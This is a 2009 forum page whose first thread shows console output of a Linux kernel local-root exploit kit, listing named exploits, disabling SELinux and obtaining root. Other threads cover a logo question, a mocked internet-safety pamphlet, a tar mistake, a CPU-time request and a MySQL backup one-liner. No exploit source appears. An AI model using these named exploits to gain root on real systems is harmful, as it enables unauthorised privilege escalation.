Science Forums - Computer Science and Technology

Ridiculous 2.6 Exploit

alexander — Thu, 19 Nov 2009 21:59:26 GMT

So the other day, this guy, spender, found an exploit in the linux kernel that disables selinux rules, effecting basically almost every 2.6 kernel... payload? root, i call it root in one easy step, here's output from a run i did on my system earlier on:

Code:

alexander@alex:~/$ uname -a

Linux alex 2.6.31-14-generic #48-Ubuntu SMP Fri Oct 16 14:05:01 UTC 2009 x86_64 GNU/Linux

alexander@alex:~/$ id

uid=1000(alexander) gid=1000(alexander) groups=4(adm),20(dialout),24(cdrom),46(plugdev),110(lpadmin),111(sambashare),112(admin),126(burning),1000(alexander)

alexander@alex:~/$ ./run_exploit.sh 

Compiling exp_cheddarbay.c...OK.

Compiling exp_ingom0wnar.c...OK.

Compiling exp_moosecox.c...OK.

Compiling exp_paokara.c...OK.

Compiling exp_powerglove.c...OK.

Compiling exp_therebel.c...OK.

Compiling exp_vmware.c...failed.

Compiling exp_wunderbar.c...OK.

 [+] MAPPED ZERO PAGE!

Choose your exploit:

 [0] Cheddar Bay: Linux 2.6.30/2.6.30.1 /dev/net/tun local root

 [1] MooseCox: Linux-2.X->Linux.2.6.31.unfixed pipe local root

 [2] Paokara: Linux 2.6.19->2.6.31.1 eCryptfs local root

 [3] Powerglove: Linux 2.6.31 perf_counter local root

 [4] The Rebel: Linux < 2.6.19 udp_sendmsg() local root

 [5] Wunderbar Emporium: Linux 2.X sendpage() local root

 [6] Exit

> 1

 ------------------------------------------------------------------------------

 [+] Resolved selinux_enforcing to 0xffffffff819b7ba8

 [+] Resolved selinux_enabled to 0xffffffff819b7ba4

 [+] Resolved apparmor_enabled to 0xffffffff817f7184

 [+] Resolved security_ops to 0xffffffff819b6330

 [+] Resolved default_security_ops to 0xffffffff817b5120

 [+] Resolved sel_read_enforce to 0xffffffff8122dc20

 [+] Resolved audit_enabled to 0xffffffff81976324

 [+] Resolved commit_creds to 0xffffffff8107f270

 [+] Resolved prepare_kernel_cred to 0xffffffff8107f480

 [+] Using newer pipe_inode_info layout

 [+] We'll let this go for a while if needed...

 [+] got ring0!

 [+] detected cred support

 [+] Disabled security of : nothing, what an insecure machine!

 [+] Got root!

sh: gthumb: not found

# id

uid=0(root) gid=0(root)

#

if that's not ridiculous, i don't know what is....

The sad part is that this is not an issue found in selinux code itself, its a compiler optimization problem, which is crazy, right? So, question is, how do we protect from these types of exploits in the future, and also dark wizards?

Photo Help

OpenMind5 — Tue, 17 Nov 2009 20:48:46 GMT

Hey Guys and Gals,

I have been trying to get an image to work for a project of mine.

I have attached what I have so far.
I want to use it as a logo for a future site...and I can't get the image any bigger without it getting all pixel-y.

I really would love to have a larger rendering of this image that was nice and sharp...
Any suggestions as to how to get it?

Thanks guys.

Attached Thumbnails

Why should people who make policies, be required to know about the subject at stake!

alexander — Mon, 16 Nov 2009 14:59:10 GMT

Firstly the source, this might not stay here for too too long, so i will copy and paste the interesting parts of this, because it's so hilarious, original source: Thurston County Sheriff's Office

highlights:

Quote:

The "Information Super Highway," which is made up of commercial online services such as Prodigy, America Online, CompuServe, and the Internet

And the Internet? lol and it continues

Quote:

allows millions of people around the world to communicate anonymously in a virtually uncontrolled electronic world

LOL, a, the internet is not anonymous, and hasn't been for many years, and the electronic world is very much controlled...

Quote:

As parents, you should notify the ISP (Internet Service Provider) or BBS (Bulletin Board System) SYSOP (system operator) of the problem.

Lol, BBS, it's really hard to find one today, there are probably a few in the world still operating... Make sure you stress to your kids how important it is to keep their horse clean, cavalry is an important part of modern battle-field.

Most parents have no clue what an ISP is, never mind how to contact them, or that usually ISP has nothing to do with the abuse they mention above, like:

Quote:

Do not respond to anyone who leaves you obnoxious, sexual, or menacing email.

Quote:

Be aware of undesirable chat rooms and bulletin boards. Use the "parental discretion" options when necessary to block these areas.

gets us to the best section ever, if your child does this, they might be a computer criminal:

Quote:

withdraws from friends, family, "lives on the computer," and may lose interest in social activities

ok, thats like 1/2 the people who use computers, or just aging ;)

Quote:

Use of a new, unusual vocabulary, heavy with computer terms, satanic phrases, sexual references or a sudden interest in related hard rock or satanic oriented posters, music, etc.

LOL

Quote:

Look for related doodling or writing using of words such as: Hacking, Phreaking, or any words with "ph" replacing 'f"

Yes, lol, and if they are involved with drugs, look for drug-related doodling, marijuana leafs, words like crack, meth, acid, or any chemical terms you might not be familiar with.

Quote:

Lack of interest in self and appearance, grooming and hygiene, or indications of lack of sleep, sudden drop in school grades, and unauthorized absences from classes.

Unauthorized absence from computer classes is what gets people to write articles like this....

Quote:

The computer and modem are running late at night, even when unattended

Quote:

Computer files ending in GIF, JPG, BMP, TIF, PCX, DL, GL, FLI, MPG, AVI, MOV - these are picture or graphic files and parents should know what they illustrate. Image files may be pictures of a sexual nature and can be of very high quality, moving pictures, and even include sound.

lol moving pictures... yes, keep sex secret from your high-schooler, lol, and interest in the opposite sex in the beginning stages of child's sexual maturity is a clear indication of criminal activities

Quote:

Names on communication programs that seem satanic, pornographic, rude, or vulgar in nature

Yes, like irc programs, such as mirc, xchat, etc (there are many more), or anonymity programs like tor, all share this trend...

Quote:

An obsession with fantasy adventure games such as Dungeons and Dragons and Trade Wars

rotflamao

Quote:

Use of the computer to scan or run telephone or credit card numbers

and how are parents to find out about this exactly, oh right

Quote:

If the computer is showing a series of changing numbers, the computer may be running a hacking program trying to identify calling card "pin" numbers, long distance access numbers, or be attempting to validate credit card numbers.

someone's been watching too much TV, lol...

So, bottom line is, how do we disallow policy-makers from making policies about subjects they haven't the first clue about? This is funny, but it is scary because most people don't know any better but to follow those guide-lines, trusting the gov-t office to "know best", and it's sad that the people behind crap like this don't even care enough to try to make the best advise they can actually make that is relevant to today's world...

Something to think/talk about.

Stupid things you catch yourself doing, that make you go "GAH!!"

alexander — Tue, 03 Nov 2009 23:20:44 GMT

ok, just did this:
scp'd this tar over... its a little over 200M
went to extract it with
tar cvf file.tar .
... DOH
scpying it over again......

Slack cores/cluster anybody?

UncleAl — Tue, 03 Nov 2009 03:17:56 GMT

Do folks have a fast box (core duo) sitting idle or a bored cluster with nothing to do? Uncle Al could use a donation of, oh, 20,000 CPU-hrs in Linux. (Knoppix Live 5.3, not 6.x, is an excellent DvD boot for any box. Remember to start typing within 60 seconds at the first splash screen, at the bottom, knoppix lang=us dma [ENTER])

Uncle Al is again crunching a monstrous iterative problem,

http://www.mazepath.com/uncleal/glydense.png
Theory is -2 slope, 0.4633849 intercept.
http://www.mazepath.com/uncleal/gly2dens.png
Needs more crunching to 35K radius.
PURSUING THE LIMITS OF FAILED SYMMETRY

Linux static file, about 5 MB of output, excecutes in RAM, only uses a hard or flash drive to hold the program and results. If you want to compile the C++ source file yourself, that's also OK.

My AMD FX-55 is crunching dense out to 20,000 A radius (finish around March). A Canadian core-duo Mac is doing 20K-25K (60 overnights). 25K-35K is open. Execution time increases as (radius)^2. Windoze is 40% slower in the same iron. Got crunch?

Here or xenophage'usual connector'gmail(give it a dot)com

One line king strikes again :)

alexander — Fri, 23 Oct 2009 18:26:09 GMT

So if you haven't caught on, i like to make random 1 line long scripts that do cool things, and this is one of these times when its no different, introducing the one liner that does my mysql backups :)

Code:

cd / && tar cf root/01_mysql_nightly.tar var/log/mysql/`ls -t1 /var/log/mysql | head -n2 | sed -n 2p` && for file in `ls -t1 /var/backups/ | head -n2`; do tar rf root/01_mysql_nightly.tar var/backups/${file}; done && gzip -f root/01_mysql_nightly.tar && wput root/01_mysql_nightly.tar.gz ftp://user:pass@1.2.3.4/01_mysql_nightly.tar.gz

so a little more explanation is needed here...

Mini MySQL backup howto:

i use unix's logrotate utility to do the actual mysql dumps, to do that i have created a folder /var/backups
then i created a logrotate job /etc/logrotate.d/mysql_backup

Code:

/var/backups/mybase.sql.gz {

        rotate 60

        daily

        nocompress

        nocopytruncate

        postrotate

          HOME=/root mysqldump --opt --all-databases --master-data=2 --flush-logs | gzip > /var/backups/mybase.sql.gz

        endscript

}

you can then
touch /var/backup/mybase.sql.gz
and run
logrotate -f /etc/logrotate.d/mysql_backup
which will do the first rotation :)
then i created a cron task to run logrotate at midnight, because i want everything to be all set for the 1am tape write for sure
so
crontab -e
added a line

Code:

0 0 * * * /usr/sbin/logrotate /etc/logrotate.d/mysql_backup && /root/./ftp_backup.sh

ok so that will run logrotate and then execute this ftp_backup script. Since we have a san that writes tapes for everything that's on it, if you throw things on the san, they are automagically backed up each night to tape, all i gotta do is ftp the backup up there (yea yea i know, ftp sucks, not my choice either)
I decided to have a backup scheme as such, i back up today's and yesterday's dumps, as well as the binlog between those dates, this way if something is corrupt in the newest backup, i can use the previous backup, dump the transactions out of the binlog, edit the ones that cause the issue, replay them, and i have a functioning DB (without having to pull 2 tapes), so i incorporated this need int o my one line script

ftp_backup.sh

Code:

#!/bin/bash

cd / && tar cf root/01_mysql_nightly.tar var/log/mysql/`ls -t1 /var/log/mysql | head -n2 | sed -n 2p` && for file in `ls -t1 /var/backups/ | head -n2`; do tar rf root/01_mysql_nightly.tar var/backups/${file}; done && gzip -f root/01_mysql_nightly.tar && wput root/01_mysql_nightly.tar.gz ftp://user:pass@1.2.3.4/01_mysql_nightly.tar.gz

done, change the script permission to 700 and we are done :)